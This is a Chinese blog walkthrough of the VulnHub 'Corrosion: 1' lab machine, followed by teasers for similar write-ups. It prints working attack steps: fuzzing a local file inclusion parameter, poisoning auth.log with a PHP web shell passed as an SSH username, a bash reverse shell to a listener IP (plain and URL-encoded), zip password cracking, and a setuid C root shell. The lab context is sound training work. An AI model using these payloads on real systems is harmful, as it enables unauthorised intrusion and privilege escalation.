代码编织梦想

准备

攻击机:kali

靶机: CORROSION: 1 NAT 192.168.91.0 网段

下载连接:

https://www.vulnhub.com/entry/corrosion-1,730/
在这里插入图片描述

信息搜集与利用

主机发现

python3 ping.py -H 192.168.91.0/24
在这里插入图片描述
如图所示得到目标靶机IP地址: 192.168.91.188

端口扫描

在这里插入图片描述
如图所示只开放了 22,80 两个端口。

HTTP

http://192.168.91.188/
在这里插入图片描述

目录扫描

在这里插入图片描述
挨个访问上面的路径:
http://192.168.91.188/tasks/
在这里插入图片描述
http://192.168.91.188/tasks/tasks_todo.txt
在这里插入图片描述

# 需要完成的任务
1.更改授权日志的权限
2. 更改端口 22 -> 7672
3.设置phpMyAdmin

翻译过来大致如此,看来这个靶机和日志,ssh, phpmyadmin有关。
http://192.168.91.188/blog-post/
http://192.168.91.188/blog-post/uploads/
这两个连接访问是一样的。
在这里插入图片描述
这个页面没什么有用的。
http://192.168.91.188/blog-post/archives/randylogs.php
这个页面根据根据名称可以判断出 可以文件包含 日志,但是我们看不到源代码不知道包含参数。
在这里插入图片描述

FFUF

但是可以猜测一下,不过可以使用 ffuf 工具来进行模糊测试(FUZZ)

在这里插入图片描述
如图所示得到关键词 file, 卧槽他妈的直接猜也可以猜出来。

那么我们现在文件包含一下:
http://192.168.91.188/blog-post/archives/randylogs.php?file=/etc/passwd
在这里插入图片描述
可以发现只有 root, randy 两个用户具有 /bin/bash

接下来尝试包含日志文件,如果忘记了日志文件的目录位置可以使用字典:
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
如图所示 /var/log/auth.log 正是我们需要的日志文件,且在 task/task_todo.txt 中 第一条有提示:

  1. Change permissions for auth log

先来测试一下:随便使用一个用户名比如test ssh 登陆看看该日志的结果是什么?
在这里插入图片描述
很明显大家都知道这个是登陆不了的。现在查看日志最下面的显示结果:
view-source:http://192.168.91.188/blog-post/archives/randylogs.php?file=/var/log/auth.log
在这里插入图片描述
如图所示很明显的 显示 用户名错误,密码错误。

反弹shell

现在尝试ssh日志写入一句话木马!只需将用户名跟更改为一句话木马即可。

ssh ‘<?php system($\_REQUEST['cmd']);?>’@192.168.91.188

这条命令我试了很多,将 cmd 改为其他字符有时可以执行命令有时又不能执行,很玄学啊!!!
在这里插入图片描述
然后访问:

view-source:http://192.168.91.188/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=ls%20-alh
然后查看源代码最下面:
在这里插入图片描述
可以看到 命令 &cmd=ls -alh 执行成功,那么现在可以执行命令,我们尝试反弹shell
首先在kali 上监听
nc -lvnp 4444
然后执行命令:

// 要先将下面代码URL编码,然后执行
echo "bash -i >& /dev/tcp/172.18.171.250/4444 0>&1" | bash

http://192.168.91.188/blog-post/archives/randylogs.php?file=/var/log/auth.log&cmd=echo%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F172.18.171.250%2F4444%200%3E%261%22%20%7C%20bash

在这里插入图片描述
在这里插入图片描述
如图所示得到了一个 webshell
lsb-release -a
在这里插入图片描述
如图所示可以看到版本为 ubuntu 21.04 既然这么高那不可能存在系统漏洞的。所以这种情况只有出题人人为留下的漏洞了。

搜索SUID发现也没有可用的。

查看 randylogs.php 发现内容很简单:
在这里插入图片描述

可疑文件

后来发现在 目录
/var/backups/ 下存在 user_backup.zip 文件,看着很可疑

在这里插入图片描述
尝试解压后发现,需要密码:
在这里插入图片描述
将其下载到 kali 中来破解密码:
现在靶机中输入如下命令:
python3 -m http.server 8000

python3 和 python2 的方式不一样,python2 是: python2 -m SimpleHTTPServer 8000
在这里插入图片描述
浏览器访问查看是否奏效
http://192.168.91.188:8000/
在这里插入图片描述

密码破解

ok,现在下载即可

wget http://192.168.91.188:8000/user_backup.zip
在这里插入图片描述
输入如下命令:
zip2john user_backup.zip > hash.txt
在这里插入图片描述
会生成 hash.txt
然后使用 john 进行破解,同时指定一个强一点的字典(kali自带)
在这里插入图片描述
注意 --wordlist= 路径, 别忘了等于符号,很快就能破解出密码: !randybaby

现在得到了密码在kali下解压。在靶机中解压直接跳过了输入密码的环节

unzip user_backup.zip
在这里插入图片描述
cat easysysinfo.c
在这里插入图片描述
这个C文件其中

#include<unistd.h>
void main()
{ setuid(0); // 设置 userid 为0 即为最高权限(root)
  setgid(0); // 设置 groupid 为0 即为最高权限(root)
  system("/usr/bin/date"); // 执行命令

  system("cat /etc/hosts"); // 执行命令

  system("/usr/bin/uname -a"); // 执行命令

}

在kali上编译运行查看效果:
在这里插入图片描述
那么可以编辑这个文件 来得到 root 权限。先登陆靶机再说。
cat id_rsa.pub
在这里插入图片描述
可以看到公钥显示为用户 randy的,
cat my_password.txt
在这里插入图片描述
得到密码: randylovesgoldfish1998

尝试使用 randy:randylovesgoldfish1998 ssh登陆,这里使用 ssh工具(MobaXterm)登陆,方便上传下载文件。
在这里插入图片描述
如图所示登陆成功

flag 1

当前目录下存在名为 user.txt 的文件
在这里插入图片描述

SUID提权

我们输入 sudo -l 来查看当前用户在系统上可以使用的命令

在这里插入图片描述
如图所示 /home/randy/tools/easysysinfo (与下载的压缩包中easyssysinfo.c 相对应)为 root 权限执行即 SUID

在这里插入图片描述
如图所示 -rw-s-r-xr-x 中 s 就代表 可以利用这个进行 SUID 提权。同时存在 .py 文件
我们输入命令 find / -perm -u=s -type f 2>/dev/null 也可以看到这个文件
在这里插入图片描述
好了,现在更加确定这个文件能达到我们的目的,先看看 easysysinfo.py
在这里插入图片描述
我们还是编辑压缩包中的 c 文件来提取,因为我不知道 python怎么编译为可执行文件。c语言可以直接 gcc 编译为可执行文件,先which 或者 whereis 查看一下有没有gcc命令。
在这里插入图片描述
which gcc 截图截掉了。
vi easysysinfo.c

#include "unistd.h"
#include "stdlib.h"
void main()
{
        setuid(0);
        setgid(0);
        system("bash -i");
}

在这里插入图片描述

gcc easysysinfo.c -o easysysinfo

在这里插入图片描述
sudo ./easysysinfo
在这里插入图片描述
如图所示拿到了 root 权限。

flag 2

在这里插入图片描述

总结

  1. ffuf 进行模糊测试。
  2. 利用 /var/log/auth.log 进行 getshell。
  3. c 语言也可以用来提权。
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Czheisenberg/article/details/122952577

MySQL info是什么意思_info是什么意思?info文件夹是干什么...-爱代码爱编程

2016-07-15 09:42黄盛权 客户经理 Hash,一般翻译做"散列”,也有直接音译为"哈希"的,就是把任意长度的输入(又叫做预映射, pre-image),通过散列算法,变换成固定长度的输出,该输出就是散列值。这种转换是一种压缩映射,也就是,散列值的空间通常远小于输入的空间,不同的输入可能会散列成相同的输出,而不可能从散列值来唯一的确定输入

VulnHub BTRsys-2 进行渗透测试的总结与过程-爱代码爱编程

BTRsys-2 主机发现 用netdiscover工具进行内网主机发现。 Netdiscover简介:专用的二层发现工具。拥有主动和被动发现两种方式。 我使用以下命令: netdiscover -i eth0 命令解释: -i:网卡,选择你监控的网卡。比如eth0。 如图: 工具执行后内容: 只有192.168.1.105是未知ip

VulnHub日记(四):Corrosion-爱代码爱编程

靶机介绍 难度:容易 对于初学者来说,这是一个简单的盒子,但不太容易。祝你好运 提示:枚举属性 虚拟机链接:https://www.vulnhub.com/entry/corrosion-1,730/ 参考博客:https://nepcodex.com/2021/08/corrosion-walkthrough-vulnhub-writeup/

VulnHub靶场-Corrosion:1-爱代码爱编程

靶场下载地址:Corrosion:1 下载好之后导入virtualbox启动 Kali IP地址: Nmap扫描靶机IP: Nmap扫端口: 浏览器访问80端口: 没发现什么有用的信息 Dirbuster扫目录: 访问一下扫到的内容,发现了txt文件里似乎有提示信息 推测是在登录日志中可能存在文件包含 Fuzz找下参数: ssh登录尝试

vulnhub靶机-Corrosion-爱代码爱编程

 1、找到靶机ip:192.168.162.131 nmap -sn 192.168.162.0/24 2、扫描靶机端口,发现开放22和80端口 ┌──(root💀cracer)-[~] └─# nmap -A -p- 192.168.162.131 Starting Nmap 7.91 ( https://nmap.org ) Nmap sca

VulnHUb日记(十四): Corrosion:2-爱代码爱编程

参考链接 Vulnhub:Corrosion:2参考博客 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.135 fping 192.168.56.0/24 nmap 扫描主机 nap-A -v -p- 192.168.56.135 开启了80和8080两个http服务,分别访问 gobuster

vulnhub靶场,CORROSION: 1-爱代码爱编程

vulnhub靶场,CORROSION: 1 环境准备 靶机下载地址:https://www.vulnhub.com/entry/corrosion-1,730/ 攻击机:kali(192.168.109.128) 靶机:CORROSION: 1(192.168.109.192) 下载好靶机之后直接使用VMware Workstation Pro虚拟机

【Vulnhub靶场】CORROSION: 2-爱代码爱编程

环境准备 下载好靶机后导入到vmware里面 这没啥好说的 题目没给IP地址需要我们自己探测 攻击机IP地址为:192.168.2.16 靶机IP地址为:192.168.2.17 信息收集 使用arp-scan命令扫描靶机的IP地址 使用namp扫描靶机开放的端口 靶机开放了ssh和tomcat 渗透开始 首先访问80端口 很正常的一个页面,没有

vulnhub靶场——DarkHole 1-爱代码爱编程

准备 攻击机: kali,win11靶机: DARKHOLE: 1 NAT 192.168.91.0 网段下载链接: https://www.vulnhub.com/entry/darkhole-1,724/ 信息搜集与利用 主机发现 python3 ping.py -H 192.168.91.0/24如图所示得到目标靶机IP地址: 192.16

【VULNHUB靶机】Corrosion: 1-爱代码爱编程

在家隔离,好久没玩靶机了,现在来整一个。 靶机信息 下载地址:https://www.vulnhub.com/series/corrosion,491/ 下载之后直接导入到vmeware即可 打靶过程 信息收集,nmap+masscan,发现有22,80端口 打开80端口,发现是ubuntu页面,用御剑扫没有扫出目录。用kali自带的dirbu